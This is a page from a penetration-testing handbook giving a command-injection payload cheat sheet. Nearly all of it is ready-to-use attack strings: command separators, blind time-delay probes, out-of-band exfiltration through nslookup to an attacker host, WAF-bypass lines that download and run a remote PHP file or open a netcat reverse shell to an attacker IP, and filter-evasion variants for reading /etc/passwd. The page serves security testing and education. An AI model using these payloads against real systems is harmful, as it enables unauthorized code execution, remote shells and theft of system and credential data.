Pentest Book
Search…
Command Injection
Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application.
1
# For detection, try to concatenate another command to param value
2
&
3
;
4
Newline (0x0a or \n)
5
&&
6
|
7
||
8
# like: https://target.com/whatever?param=1|whoami
9
10
# Blind (Time delay)
11
https://target.com/whatever?param=x||ping+-c+10+127.0.0.1||
12
13
# Blind (Redirect)
14
https://target.com/whatever?param=x||whoami>/var/www/images/output.txt||
15
16
# Blind (OOB)
17
https://target.com/whatever?param=x||nslookup+burp.collaborator.address||
18
https://target.com/whatever?param=x||nslookup+`whoami`.burp.collaborator.address||
19
20
# Common params:
21
cmd
22
exec
23
command
24
execute
25
ping
26
query
27
jump
28
code
29
reg
30
do
31
func
32
arg
33
option
34
load
35
process
36
step
37
read
38
function
39
req
40
feature
41
exe
42
module
43
payload
44
run
45
print
46
47
# Useful Commands: Linux
48
whoami
49
ifconfig
50
ls
51
uname -a
52
53
# Useful Commands: Windows
54
whoami
55
ipconfig
56
dir
57
ver
58
59
# Both Unix and Windows supported
60
ls||id; ls ||id; ls|| id; ls || id
61
ls|id; ls |id; ls| id; ls | id
62
ls&&id; ls &&id; ls&& id; ls && id
63
ls&id; ls &id; ls& id; ls & id
64
ls %0A id
65
66
# Time Delay Commands
67
& ping -c 10 127.0.0.1 &
68
69
# Redirecting output
70
& whoami > /var/www/images/output.txt &
71
72
# OOB (Out Of Band) Exploitation
73
& nslookup attacker-server.com &
74
& nslookup `whoami`.attacker-server.com &
75
76
# WAF bypasses
77
vuln=127.0.0.1 %0a wget https://evil.txt/reverse.txt -O /tmp/reverse.php %0a php /tmp/reverse.php
78
vuln=127.0.0.1%0anohup nc -e /bin/bash <attacker-ip> <attacker-port>
79
vuln=echo PAYLOAD > /tmp/payload.txt; cat /tmp/payload.txt | base64 -d > /tmp/payload; chmod 744 /tmp/payload; /tmp/payload
80
81
# Some filter bypasses
82
cat /etc/passwd
83
cat /e”t”c/pa”s”swd
84
cat /’e’tc/pa’s’ swd
85
cat /etc/pa??wd
86
cat /etc/pa*wd
87
cat /et’ ‘c/passw’ ‘d
88
cat /et$()c/pa$()$swd
89
{cat,/etc/passwd}
90
cat /???/?????d
Copied!
Last modified 8mo ago
Export as PDF
Copy link